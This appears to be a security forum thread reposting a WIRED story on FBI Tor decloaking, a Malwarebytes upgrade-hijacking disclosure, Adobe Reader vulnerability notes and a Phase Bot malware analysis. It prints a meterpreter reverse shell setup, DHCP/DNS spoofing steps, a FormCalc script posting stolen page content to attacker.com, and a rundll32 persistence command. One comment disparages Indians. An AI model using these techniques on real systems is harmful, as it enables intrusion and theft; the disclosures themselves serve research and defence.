The FBI Used the Web’s Favorite Hacking Tool to Unmask Tor Users By Kevin Poulsen 12.16.14 | 7:00 am Cheryl Graham/Getty Images For more than a decade, a powerful app called Metasploit has been the most important tool in the hacking world: An open-source Swiss Army knife of hacks that puts the latest exploits in the hands of anyone who’s interested, from random criminals to the thousands of security professionals who rely on the app to scour client networks for holes. Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network. That attack, “Operation Torpedo,” was a 2012 sting operation targeting users of three Dark Net child porn sites. Now an attorney for one of the defendants ensnared by the code is challenging the reliability of the hackerware, arguing it may not meet Supreme Court standards for the admission of scientific evidence. “The judge decided that I would be entitled to retain an expert,” says Omaha defense attorney Joseph Gross. “That’s where I am on this—getting a programming expert involved to examine what the government has characterized as a Flash application attack of the Tor network.” A hearing on the matter is set for February 23. Tor, a free, open-source project originally funded by the US Navy, is sophisticated anonymity software that protects users by routing traffic through a labyrinthine delta of encrypted connections. Like any encryption or privacy system, Tor is popular with criminals. But it also is used by human rights workers, activists, journalists and whistleblowers worldwide. Indeed, much of the funding for Tor comes from grants issued by federal agencies like the State Department that have a vested interest in supporting safe, anonymous speech for dissidents living under oppressive regimes. With so many legitimate users depending upon the system, any successful attack on Tor raises alarm and prompts questions, even when the attacker is a law enforcement agency operating under a court order. Did the FBI develop its own attack code, or outsource it to a contractor? Was the NSA involved? Were any innocent users ensnared? Now, some of those questions have been answered: Metasploit’s role in Operation Torpedo reveals the FBI’s Tor-busting efforts as somewhat improvisational, at least at first, using open-source code available to anyone. Created in 2003 by white hat hacker HD Moore, Metasploit is best known as a sophisticated open-source penetration testing tool that lets users assemble and deliver an attack from component parts—identify a target, pick an exploit, add a payload and let it fly. Supported by a vast community of contributors and researchers, Metasploit established a kind of lingua franca for attack code. When a new vulnerability emerges, like April’s Heartbleed bug, a Metasploit module to exploit it is usually not far behind. Moore believes in transparency—or “full disclosure”—when it comes to security holes and fixes, and he’s applied that ethic in other projects under the Metasploit banner, like the Month of Browser Bugs, which demonstrated 30 browser security holes in as many days, and Critical.IO, Moore’s systematic scan of the entire Internet for vulnerable hosts. That project earned Moore a warning from law enforcement officials, who cautioned that he might be running afoul of federal computer crime law. In 2006, Moore launched the “Metasploit Decloaking Engine,” a proof-of-concept that compiled five tricks for breaking through anonymization systems. If your Tor install was buttoned down, the site would fail to identify you. But if you’d made a mistake, your IP would appear on the screen, proving you weren’t as anonymous as you thought. “That was the whole point of Decloak,” says Moore, who is chief research officer at Austin-based Rapid7. “I had been aware of these techniques for years, but they weren’t widely known to others.” One of those tricks was a lean 35-line Flash application. It worked because Adobe’s Flash plug-in can be used to initiate a direct connection over the Internet, bypassing Tor and giving away the user’s true IP address. It was a known issue even in 2006, and the Tor Project cautions users not to install Flash. The decloaking demonstration eventually was rendered obsolete by a nearly idiot-proof version of the Tor client called the Tor Browser Bundle, which made security blunders more difficult. By 2011, Moore says virtually everyone visiting the Metasploit decloaking site was passing the anonymity test, so he retired the service. But when the bureau obtained its Operation Torpedo warrants the following year, it chose Moore’s Flash code as its “network investigative technique”—the FBI’s lingo for a court-approved spyware deployment. Torpedo unfolded when the FBI seized control of a trio of Dark Net child porn sites based in Nebraska. Armed with a special search warrant crafted by Justice Department lawyers in Washington DC, the FBI used the sites to deliver the Flash application to visitors’ browsers, tricking some of them into identifying their real IP address to an FBI server. The operation identified 25 users in the US and an unknown number abroad. Gross learned from prosecutors that the FBI used the Decloaking Engine for the attack — they even provided a link to the code on Archive.org. Compared to other FBI spyware deployments, the Decloaking Engine was pretty mild. In other cases, the FBI has, with court approval, used malware to covertly access a target’s files, location, web history and webcam. But Operation Torpedo is notable in one way. It’s the first time—that we know of—that the FBI deployed such code broadly against every visitor to a website, instead of targeting a particular suspect. The tactic is a direct response to the growing popularity of Tor, and in particular an explosion in so-called “hidden services”—special websites, with addresses ending in .onion, that can be reached only over the Tor network. Hidden services are a mainstay of the nefarious activities carried out on the so-called Dark Net, the home of drug markets, child porn, and other criminal activity. But they’re also used by organizations that want to evade surveillance or censorship for legitimate reasons, like human rights groups, journalists, and, as of October, even Facebook. A big problem with hidden service, from a law enforcement perceptive, is that when the feds track down and seize the servers, they find that the web server logs are useless to them. With a conventional crime site, those logs typically provide a handy list of Internet IP addresses for everyone using the site – quickly leveraging one bust into a cascade of dozens, or even hundreds. But over Tor, every incoming connection traces back only as far as the nearest Tor node—a dead end. Thus, the mass spyware deployment of Operation Torpedo. The Judicial Conference of the United States is currently considering a Justice Department petition to explicitly permit spyware deployments, based in part on the legal framework established by Operation Torpedo. Critics of the petition argue the Justice Department must explain in greater detail how its using spyware, allowing a public debate over the capability. “One thing that’s frustrating for me right now, is it’s impossible to get DOJ to talk about this capability,” says Chris Soghoian, principal technologist at the ACLU. “People in government are going out of their way to keep this out of the discussion.” For his part, Moore has no objection to the government using every available tool to bust pedophiles–he once publicly proposed a similar tactic himself. But he never expected his long-dead experiment to drag him into a federal case. Last month he started receiving inquiries from Gross’ technical expert, who had questions about the efficacy of the decloaking code. And last week Moore started getting questions directly from the accused pedophile in the case— a Rochester IT worker who claims he was falsely implicated by the software. Moore finds that unlikely, but in the interest of transparency, he answered all the questions in detail. “It only seemed fair to reply to his questions,” Moore says. “Though I don’t believe my answers help his case at all.” Using the outdated Decloaking Engine would not likely have resulted in false identifications, says Moore. In fact, the FBI was lucky to trace anyone using the code. Only suspects using extremely old versions of Tor, or who took great pains to install the Flash plug-in against all advice, would have been vulnerable. By choosing an open-source attack, the FBI essentially selected for the handful offenders with the worst op-sec, rather than the worst offenders. Since Operation Torpedo, though, there’s evidence the FBI’s anti-Tor capabilities have been rapidly advancing. Torpedo was in November 2012. In late July 2013, computer security experts detected a similar attack through Dark Net websites hosted by a shady ISP called Freedom Hosting—court records have since confirmed it was another FBI operation. For this one, the bureau used custom attack code that exploited a relatively fresh Firefox vulnerability—the hacking equivalent of moving from a bow-and-arrow to a 9-mm pistol. In addition to the IP address, which identifies a household, this code collected the MAC address of the particular computer that infected by the malware. “In the course of nine months they went from off the shelf Flash techniques that simply took advantage of the lack of proxy protection, to custom-built browser exploits,” says Soghoian. “That’s a pretty amazing growth … The arms race is going to get really nasty, really fast.” Sursa: The FBI Used the Web's Favorite Hacking Tool to Unmask Tor Users | WIRED

Mai e si Cyborg Hawk. Ambele facute de indieni. Niste jeguri. Nu folositi asa ceva.

Super. Pacat ca nu stiam de el cand cautam asa ceva.

Doar un titlu fancy pentru SQLI - Login bypass...

CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking In June of this year I was playing around with Malwarebytes’s products. I blogged about one of their products, Malwarebytes Anti-Malware, before when it had some issues; you can read that blog entry [ here ]. While playing around with Anti-Malware I discovered you could easily hijack the upgrade mechanism. After figuring out the protocol I could push my own upgrades. I reported this to Malwarebytes on July 16th, it got a CVE assigned: CVE-2014-4936. About half a month later, around the time Malwarebytes had released their Anti-Exploit product Beta I started to play around with this one as well. I discovered it was subject to the same upgrade hijacking method. Both vulnerabilities were scaled under one CVE, it was a shared mechanism (and code). Officially the description for this CVE has become: Malwarebytes Anti-Malware in consumer version 2.0.2 and earlier and Malwarebytes Anti-Exploit in consumer version 1.03 and earlier allow attackers to execute arbitrary code by hijacking the underlying network layer or DNS infrastructure between the client PC and the Malwarebytes Content Delivery Network (CDN). Corporate versions are not affected. One thing to note is that consumer versions of MBAM and MBAE are affected by this. Business versions of the products do not use the Malwarebytes CDN for upgrades. This blog entry describes the vulnerability, how it works and how you can perform the attack including a POC. Code for the POC is hosted on my Github repository: [ CVE-2014-4936 POC ] Timeline: Malwarebytes Anti-Malware Vulnerability discovered: June 18th 2014 Vulnerability reported: July 16th 2014 Vulnerability fixed in version 2.0.3 released on October 3rd 2014 [*]Malwarebytes Anti-Exploit Vulnerablity discovered: August 19th 2014 Vulnerability reported: August 21st 2014 Vulnerability fixed in version 1.04.1.1012 released on September 5th 2014 The vulnerability Both Anti-Malware and Anti-Exploit have upgrade capabilities through the form of HTTP transfered installation packages. Both software packages have no or limited upgrade validation implemented thus allowing anyone who can work out the upgrade protocol to inject their own payload. Updates and Upgrades When the software, either MBAM or MBAE, starts it will first resolve the Malwarebytes CDN: 192.168.2.102 -> 8.8.8.8 (DNS) Standard query A data-cdn.mbamupdates.com For MBAM it will start checking versions of the following: Consumer config Consumer news Consumer versioncheck Consumer HTML Signature database Program upgrades If any of the version requests respond with a higher number than the client itself has it will start downloading a partial or full update/upgrade. For the program upgrading it will download an installer for the latest version. We are interested in the program upgrade as we can use this to, with ease, send malicious payloads without having to go into any advanced exploitation techniques. The client will start by sending a version request: In the version request the User-Agent of the client shows the version (red underlined in the top section), the client has version 1.60.1.1000. The server responds by telling the client version 1.75.0.1300 (red underlined in the bottom section) is the latest available. The client will then proceed by downloading this file by making a request to the CDN once more: The installation is downloaded and the installer for the new version starts. The problem here lies with the fact that the MBAM client does not verify the actual installer it downloads. It can be whatever arbitrary Windows PE the server gives back. This is combined with the fact that MBAM starts the new client installer with full administrative privileges. Similar implementation and the same problem occurs for MBAE as well, payloads are unchecked and executed with full administrative privileges with Malwarebytes’s protection uninstalled. This process is the same for MBAE although the request is a little bit different. MBAM makes the following 2 requests for the version check followed by the upgrade download: GET http://data-cdn.mbamupdates.com/v0/program/mbam.check.program HTTP/1.1 GET http://data-cdn.mbamupdates.com/v0/program/data/mbam-setup-<new version>.exe HTTP/1.1 MBAE makes the following requests: GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/version.chk HTTP/1.1 GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/data/mbae-setup-<new version>.exe Hijacking the upgrades, exploiting the vulnerability I have the following setup: 2 VM’s in host only network adapter mode: Windows XP running an old MBAM version 1.60.1.1000 Kali Linux running my MBAM CDN simulation python script To exploit the client and to prove the vulnerability we need to intercept the DNS requests for the data-cdn.mbamupdates.com. We can have a few options: Change the DNS adapter settings to resolve DNS with my Kali system which can do redirection Use the Windows host file to override DNS Grab ettercap in Kali and spoof towards the client to get DNS redirected. To show the POC in a more ‘natural’ environment I chose the 3rd option. I’m going to show the vulnerability by performing a DHCP spoofing attack. There are of course other methods of attacking, you just need to be able to control the DNS of the client. Let’s start: First we setup both clients running side by side, we put the two VM’s in host only adapter mode. On the Windows XP machine we install the old MBAM version, I took the oldest MBAM installer I had, version 1.60.1.1000: On Kali we also have to start the Malwarebytes CDN simulator, you can get this script from the Github repository [ here ]. The simulator doesn’t need any arguments, you can just run it by typing python Malwarebytes-CDN-Simulator-CVE-2014-4936.py: Some older versions of MBAM (1.46 for example) follow an older upgrade pattern, although the vulnerability also exists for these versions the provided Malwarebytes CDN simulator only works for MBAM since version 1.60.1.xxx. Older version will crash during the upgrade. You could adapt the POC to work for this version as well, its a matter of changing the URL’s it looks at. One thing you have to make sure of is that you throw your payload in the working directory of the CDN simulator and name it ‘payload.exe’ in order to be picked up and send to the upgrading clients. For this attack we’ll generate a meterpreter payload, we’re running Kali which has Metasploit installed already. We can quickly generate a PE payload from the commandline, in this example I use the meterpreter payload: msfcli multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4444 E Note: Rapid7 published a post regarding the deprecation of msfpayload. This means in the future this payload has to be generated slightly different. Read more on the change here: [ Good-bye msfpayload and msfencode ] The handler will start and listen for incoming connections: Our reverse handler is now ready to receive incoming connections from our meterpreter payload, we can now start our attack. Next thing we need to do is get DNS requests from the Windows XP machine redirected towards the Kali machine so it can be intercepted. We do this by grabbing Ettercap, in my case I grab Ettercap Graphical so I can visually show the attack in steps here. Lets open up Ettercap and start by setting it in unified sniffing mode, the difference from bridged mode is that in unified mode we just sniff all packets that pass on the interface, in bridged mode it will use two network interfaces and forward traffic from one to the other and perform a mitm attack. In our case we will do a DNS ‘mitm’ attack but we dont need bridged mode. After opening up unified mode the menu will change: Now its time to select our target, fom the Hosts menu open up the host list and then hit Scan for hosts. A list of hosts in the current connected network will appear, in my case there are 2: The Windows XP machine (192.168.56.102) The host running the virtual machines (192.168.56.1) We select the target, the Windows XP machine with IP 192.168.56.102 and hit the ‘Add to Target 1’ button to select it. You can view the targets by clicking the Current Targets button under the Targets menu option to see if the machine was selected. Now we have to enable the DNS spoofing, Ettercap does have a plugin called ‘dns_spoof’ but I choose to use dnslib’s intercept server. Its part of the DNSLib python library. Setting up is a single command: python -m dnslib.intercept -p 53 -a 192.168.56.103 -i '* IN A 192.168.56.103' Here we setup our listener on port 53 and bind to address 192.168.56.103 and intercept any request (* for the wildcard) and respond to it with the 192.168.56.103 IP. This means we will grab any request, you can also specify it a bit better by only responding for data-cdn.mbamupdates.com and *.data-cdn.mbamupdates.com but for ease I chose to intercept everything and route it to the Kali machine. We now can start our attack. Open up the Mitm menu option and click on Dhcp spoofing. We will spoof DHCP towards the Windows XP client so we can force our own DNS server in the DNS server settings. On the DHCP Spoofing popup we leave the IP Pool field empty, enter 255.255.255.0 in the Netmask field and put our own IP (192.168.56.103) in the DNS Server IP field to enforce the Kali host to be the DNS server for the Windows XP machine. After entering the options hit the ‘OK’ button to start the attack. In the status log we can see Ettercap is starting the attack. After we’ve started the DHCP spoofing we need to wait for the DHCP lease (or force it on the client itself) to renew so Ettercap can spoof it. After a bit Ettercap will log the DHCP request and its response to it: DHCP: [08:00:27:2F:56:97] REQUEST 192.168.56.102 DHCP spoofing: fake ACK [08:00:27:2F:56:97] assigned to 192.168.56.102 DHCP: [192.168.56.103] ACK : 192.168.56.102 255.255.255.0 GW 192.168.56.103 DNS 192.168.56.103 On the client we can now check the IPconfig settings to check for our spoofed DNS server: What we have to do now is either wait for the MBAM client on the Windows machine to contact the server for upgrades automatically or enforce it by hitting the Check for Updates button on the Update tab in the MBAM GUI. On the Malwarebytes CDN script terminal we can see the client contacted us and has downloaded the payload: root@kali:~/mbam_upgrade# python Malwarebytes-CDN-Simulator-CVE-2014-4936.py Started Malwarebytes CDN simulator. [+] Attempt for URI: /v1/news/consumer/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/news/consumer/version.chk HTTP/1.1" 200 - [+] Attempt for URI: /v1/custom/consumer/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/custom/consumer/version.chk HTTP/1.1" 200 - [+] Attempt for URI: /v1/database/rules/version.chk 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/database/rules/version.chk HTTP/1.1" 200 - 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/mbam.check.program HTTP/1.1" 200 - [+] MBAM Client program version check: Client version 1.60.1.1000, enforced update version 2.60.1.1000 192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/data/mbam-setup-2.60.1.1000.exe HTTP/1.1" 200 - [+] MBAM Client payload download. On the Windows machine we see MBAM telling us a new version is available: If we accept and run the upgrade installer we see MBAM dissapear and nothing happens. Now if you check back with the meterpreter handler we see the client has connected back to us: And due to how the upgrade works, the old MBAM install will execute the ‘installer’ with full administrative privileges as you can see by typing getuid: We have successfully injected our payload into the upgrade process of MBAM. We have taken over the Windows XP machine by abusing the vulnerability. The same process can be used to takeover MBAE clients, the only difference is the checkin URLs but the Malwarebytes CDN simulator script already takes care of it, enjoy! 11:00pm | URL: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking Sursa: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking

Recomand.

Multiple PDF Vulnerabilites - Text and Pictures on Steroids I had the pleasure to talk at the HackPra in Bochum on 22.10 this year. My topic was about Adobe Reader and the vulnerabilites I found in version 11.0.09. The Adobe PSIRT team asked me to wait until they released a patch for the presented issues. Adobe was informed on the 7th of Oktober and now the patch finally arrived. The link of the hackpra talk will be posted here and on twitter(@insertscript) as soon as it is available on youtube. Important Note: If you want to test a PoC, your IE needs to be configured to open PDFs inside the browser. Sometimes IE opens PDFs outside of the browser context, which breaks PoCs, which rely on this context. GotoE or GotoR - No Protocol Restrictions Status: Unfixed Reality: 50% fixed The PDF standards defines a list of valid ActionTypes. Two of them, GotoE and GotoR, are used to tell PDF to load PDFs from a different location. Adobe Readers does not enforce protocol restriction correctly, which makes it possible to change the location to file:///,mk-its: etc. They fixed it for GotoR but GotoE still works. In context of webbrowsers it gives you the possibility to iframe the local file system etc. Javascript and VBscript were forbidden, so no XSS possibility :/ PoC: %PDF-1.1 1 0 obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 7 0 R >> endobj [..] 7 0 obj << /Type /Action /S /GoToE /F (file:///C:/) /D (Chapter 1) >> endobj [..] PoC Reader 11 vulnerability in predefined privileged Javascript functions (CVE-2014-8451) Status: fixed Reality: fixed Before I am going to explain the vulnerability you should have a look at another vulnerability in the privileged Javascript functions this year. It explains the concept of privileged Javascript very well https://molnarg.github.io/cve-2014-0521/ There are two major steps to get privileged Javascript execution: 1) Get our function marked as a trusted or trust propagator function 2) After it is marked as a trust propagator, get it called by an already trusted function. The first step is achieved via calling the function app.trustPropagatorFunction with a function as the parameter. To be able to use it, you already need to be in a trusted code execution. It sounds unrealistic to pass all these requirements, but one specific predefined function helped a lot. See yourself: The only use of this function is to iterace over an object and mark all properties, which are functions, as a trustpropagator function. Lets say, this wasn't the best idea The first major step is done. Now we need to get a trusted function to call our marked function. If you are familiar with Javascript you know that this is not that difficult to achieve. Lets have a look at the following pre defined function: We can influence doc.path.match and let it point to our trustedproperty function. As soon as it gets called, we are in privileged Javascript mode, so we can read local files as an example. The PoC reads a local file from C:\test.txt: PoC Fix: It seems like Adobe disabled/protects app.trustPropagatorFunction, because it triggers a security exception now. Javascript function in Reader can be used to read data from external entities (CVE-2014-8452) Status: Fixed Reality: Not Fixed This one is about a simple XXE I discovered. I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in XMLData.parse. It was possible to use external entities and reference them. I read the specification and it turns out there are more functions than "parse" to read XML. I created a simple xml file, which references an url from the same domain and parsed it with loadXML. It worked: PoC The Impact is limited because o) it is limited to same origin o) HTML Pages break the xml o) Dynamic Entities are not supported o) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but I it didn't work. But it still can be used to read JSON. Same origin policy bypass in Reader (CVE-2014-8453) Status: fixed Reality: fixed but same origin still vulnerable! In my opinion this is the most powerful vulnerability. Even without the Origin Bypass it shows you how powerful/terrifying PDF can be. Many people know that PDF supports a scripting language called Javascript but there is another one. It is mentioned in the specification for XFA, a file type also supported by the adobe reader. It is called formcalc and it not that powerful. It is used for simple math calculation. But in the adobe specification there are three additional functions: 'GET','POST' and 'PUT'. Yes, their names speak for themselves. 'GET' has one parameter: an url. It will use the browser (YEAH COOKIES) to retrieve the url and return the content of it. We can then use 'POST' to send the return content to our own server: var content = GET("myfriends.php"); Post("http://attacker.com",content); These functions are same origin, so a website needs to allow us to upload a PDF. Thats not that unrealistic for most websites. Attacker.com is not same origin, so you need to setup a crossdomain.xml, as usual with Adobe products. To sum up: This is not a bug, this is a feature. As soon as you are allowed to upload a PDF on a website, you can access the website in the context of the user, who is viewing the PDF. Because the requests are issued by the browser, cookies are sent too. You can also use it to break any CSRF Protection by reading the tokens. PoC After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser as a proxy (@beef still working on the module^^) The bypass is really simple: 1. User A loads evil.pdf from http://attacker.com/evil.pdf 2. Evil.pdf uses formcalc GET to read http://attacker.com/redirect.php 3. redirect.php redirects with 301 to http://facebook.com 4. Adobe reader will follow and read the response without looking for a crossdomain.xml. 5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php This simple bypass is fixed now. I hope they going to implement a dialog warning for same origin requests too. Posted by Alex Inführ at 6:34 AM Sursa: InsertScript: Multiple PDF Vulnerabilites - Text and Pictures on Steroids

Vom rezolva problema "mobile" in viitorul apropiat. Sper.

Nu are nimeni timp. Eu nu ma pricep.

Un singur cuvant: SEO.

Greu de implementat.

[h=1]Paul Jung - Bypassing Sandboxes for Fun[/h]

[h=1]Osama Kamal - DNS Analytics, Case Study[/h]

[h=1]Karine e Silva - How to Dismantle a Botnet: the Legal Behind the Scenes[/h]

[h=1]Phase Bot - A Fileless Rootkit[/h] Phase Bot is a fileless rootkit that went on sale during late October, the bot is fairly cheap ($200) and boasts features such as formgrabbing, ftp stealing, and of course the ability to run without a file. The first thing you notice when opening it up in IDA is that the AddressOfEntryPoint is 0, this may seem like an error, but it actually isn't. Setting the entry point to 0 means the start of the DOS header is used as the entry point, this is possible because most of the fields following the MZ signature aren't required, and the M (0x4D) Z (0x5A) are actually valid instructions (dec ebp and pop edx respectively). I'm not sure the actual purpose of this trick, but it's interesting nonetheless. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Cancels out the MZ instructions then jumps to real entry point.[/TD] [/TR] [/TABLE] The real entry point is contained within the first 560 bytes of the only section in the executable, this code is designed to get data stored within the non-essential NT header fields and use it to RC4 decrypt the rest of the section, which contains the 2nd stage (shellcode). Most initialization happens is what appears to be the world longest function; the executable doesn't have an import table so functions are resolved by hash. All the initialized data such as offsets, strings, and function addresses is stored within a large structure which is passed to all functions. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]but does anyone truly know what loops are?[/TD] [/TR] [/TABLE] Once initialization is done the bot then check that PowerShell and version 2 of the .net framework is installed: if it is, normal installation continues, if not, it writes the bot code to a file in the startup folder. The malware first creates the registry key "hkcu\software\microsoft\active setup\installed components\{<GUID_STRING>}", then RC4 encrypts the 2nd stage's shellcode with the key "Phase" and writes it under the subkey "Rc4Encoded32", afterward the 64-bit shellcode is extracted and written to Rc4Encoded64 subkey, also encrypted with "Phase" as the key, a 3rd subkey is created named "JavaScript" which contains some JavaScript code. The full JavaScript is a bit long to post here, so I've uploaded it to pastebin. It simply base64 decodes a PowerShell script designed to read and decrypt the shellcode from the Rc4Encoded subkey, then runs; you can find the decoded PowerShell script here (the comments were left in by the author). For the bot to start with the system, a subkey named "Windows Host Process (RunDll)" is created under "hkcu\software\microsoft\windows\currentVersion\run", with the following value: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close(); This is a trick used by Win32/Poweliks to get rundll32 to run the code from the JavaScript subkey, which then base64 decode the PowerShell script and runs it with PowerShell.exe, you can read more about this trick here. The final stage, which runs from within PowerShell hooks the following functions by overwriting the first instruction with 0xF4 (HLT). ntdll!NtResumeThread (Inject new processes) ntdll!NtReadVirtualMemory (Hide malware's memory) ntdll!NtQueryDirectoryFile (Hide file, only if failed fileless installation) ws2_32!send (Data stealer) wininet!HttpSendRequest (Internet Explorer formgrabber) nss3!PR_Write (Firefox formgrabber) The HLT instruction is a privileged instruction which cannot be executed from ring 3, as a result it generates an 0xC0000096 Privileged Instruction exception, which the bot picks up and handles using a vectored exception handler. This is the same as standard software breakpoint hooking, but using an invalid instruction instead of int 3. As you can imagine, the executable shows all sorts of malicious signs. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]NULL AddressOfEntryPoint, missing all data directories, invalid section name.[/TD] [/TR] [/TABLE] It should be noted that some of the features advertised appear to be missing and the comments in the PowerShell code suggest that this sample is an early/testing version. I'll update if I can get hold of a newer version. Sursa: Phase Bot - A Fileless Rootkit | MalwareTech